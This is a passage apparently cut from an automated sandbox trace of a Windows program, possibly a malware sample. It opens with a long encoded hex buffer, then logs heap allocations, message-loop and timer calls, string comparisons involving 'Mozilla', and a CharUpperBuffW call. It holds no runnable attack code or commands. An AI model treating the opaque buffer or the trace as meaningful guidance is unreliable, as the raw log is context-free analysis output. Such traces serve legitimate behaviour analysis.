03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 32 [0204.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0204.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0204.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0204.331] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0204.331] TranslateMessage (lpMsg=0x8bf970) returned 0 [0204.331] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0204.331] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0204.331] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0204.331] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0204.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0204.331] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0204.331] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0204.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0204.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0204.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0204.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0204.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0204.332] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0204.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0204.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0204.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0204.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0204.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0204.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0204.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0204.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0204.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0204.334] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0204.334] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0204.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 